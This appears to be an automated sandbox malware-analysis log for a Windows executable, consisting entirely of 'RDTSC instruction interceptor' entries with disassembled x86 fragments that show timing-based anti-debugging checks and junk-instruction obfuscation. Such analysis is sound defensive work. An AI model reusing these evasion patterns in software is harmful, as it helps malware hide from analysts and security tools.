                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D46FB7 second address: D46FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D46FC1 second address: D46FDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944C70C94h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D47697 second address: D4769D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D4769D second address: D476C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA944C70C8Ch 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA944C70C8Ah 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D476C1 second address: D476CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA944B213E6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D476CC second address: D476D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D4785A second address: D4785F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D4C187 second address: D4C18B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D4C18B second address: D4C19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FA944B213E8h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D4C19D second address: D4C1B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944C70C97h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D4C1B8 second address: D4C1D4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA944B213E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jnc 00007FA944B213E6h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D171D1 second address: D171D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D53282 second address: D5328B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5328B second address: D53291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D53AA4 second address: D53AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FA944B213F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D53AC3 second address: D53AD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA944C70C86h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jo 00007FA944C70C86h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D54714 second address: D54718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D550EC second address: D550F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5521A second address: D55220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D55220 second address: D55224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D55313 second address: D5536A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA944B213E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007FA944B213F9h 0x00000012 mov si, cx 0x00000015 pop edi 0x00000016 xchg eax, ebx 0x00000017 jmp 00007FA944B213F8h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 jmp 00007FA944B213EDh 0x00000025 pop edi 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5536A second address: D55370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D55825 second address: D55887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FA944B213F3h 0x00000010 nop 0x00000011 jmp 00007FA944B213F1h 0x00000016 mov esi, ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FA944B213E8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 add edi, 0391B17Ah 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push edi 0x00000042 pop edi 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D55887 second address: D558A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5620A second address: D56210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D580A0 second address: D580A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D59ACA second address: D59AFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA944B213F0h 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FA944B213E6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5AA9C second address: D5AAA2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5B4DC second address: D5B4E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5B4E2 second address: D5B4FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007FA944C70CA1h 0x00000011 push eax 0x00000012 push edx 0x00000013 jl 00007FA944C70C86h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5B7F3 second address: D5B7FD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA944B213ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5C2F1 second address: D5C317 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FA944C70C86h 0x00000009 jmp 00007FA944C70C95h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5C317 second address: D5C31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5C083 second address: D5C092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D5C092 second address: D5C0A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnp 00007FA944B213ECh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D156AB second address: D156BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA944C70C8Dh 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D156BF second address: D156C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D623CB second address: D623D5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA944C70C8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D642D0 second address: D642E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FA944B213F2h 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D642E9 second address: D64307 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA944C70C99h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D64307 second address: D64324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA944B213E6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jl 00007FA944B213E6h 0x00000019 push esi 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D64324 second address: D64338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FA944C70C88h 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D668F0 second address: D66920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA944B213F9h 0x00000009 jmp 00007FA944B213F3h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D64A71 second address: D64A80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D66920 second address: D66926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D66EB9 second address: D66EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D68E9D second address: D68EA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D68EA2 second address: D68EE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d adc di, AE37h 0x00000012 push 00000000h 0x00000014 mov edi, 6345C2E8h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FA944C70C88h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000015h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 mov bh, EFh 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D68EE1 second address: D68EE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D69E30 second address: D69E34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D69E34 second address: D69E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6A047 second address: D6A06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FA944C70C97h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6AFF5 second address: D6AFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6CECE second address: D6CED4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6A14B second address: D6A14F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6CED4 second address: D6CEDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6DCAF second address: D6DCB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6FCE8 second address: D6FD54 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FA944C70C88h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 mov dword ptr [ebp+122D1F86h], eax 0x0000002b push 00000000h 0x0000002d xor di, 7E5Ah 0x00000032 mov bx, si 0x00000035 xchg eax, esi 0x00000036 jo 00007FA944C70C98h 0x0000003c jmp 00007FA944C70C92h 0x00000041 push eax 0x00000042 jp 00007FA944C70C98h 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007FA944C70C8Ah 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6EF24 second address: D6EF2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6EF2A second address: D6EF61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944C70C98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA944C70C96h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D6EF61 second address: D6EF66 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D70E43 second address: D70E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D71EB2 second address: D71F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007FA944B213EAh 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D2F9Fh], esi 0x00000013 push 00000000h 0x00000015 cld 0x00000016 xor dword ptr [ebp+122D212Fh], eax 0x0000001c push 00000000h 0x0000001e mov edi, dword ptr [ebp+122D1F86h] 0x00000024 js 00007FA944B213ECh 0x0000002a push eax 0x0000002b pushad 0x0000002c jno 00007FA944B213ECh 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FA944B213EDh 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D71040 second address: D7104B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA944C70C86h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D7104B second address: D71050 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D71050 second address: D7106C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA944C70C92h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D72F7F second address: D72F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D72F83 second address: D72FEB instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA944C70C86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c jmp 00007FA944C70C93h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FA944C70C88h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c sub dword ptr [ebp+122D3069h], ebx 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D1F62h], eax 0x0000003a mov bl, 52h 0x0000003c push 00000000h 0x0000003e mov dword ptr [ebp+122D203Dh], edi 0x00000044 xchg eax, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FA944C70C91h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D72FEB second address: D7301A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FA944B213F2h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D7301A second address: D73020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D7B540 second address: D7B560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D7B560 second address: D7B583 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944C70C92h 0x00000009 jng 00007FA944C70C86h 0x0000000f ja 00007FA944C70C86h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D7B583 second address: D7B59B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA944B213F2h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D7AC8D second address: D7AC91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D7AC91 second address: D7ACD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA944B213F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA944B213F2h 0x00000010 pop ebx 0x00000011 jnp 00007FA944B213FEh 0x00000017 jno 00007FA944B213EAh 0x0000001d push edx 0x0000001e js 00007FA944B213E6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D86148 second address: D8614E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D867EB second address: D867F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D867F6 second address: D867FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D867FA second address: D86807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D86A86 second address: D86A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D86A8A second address: D86AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FA944B213FFh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D86AAF second address: D86AB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8C5EF second address: D8C5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8B0DB second address: D8B0EA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA944C70C86h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\P0SJULJxI0.exeRDTSC instruction interceptor: First address: D8B5D5 second address: D8B5EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA944B213EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007FA944B213EEh 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
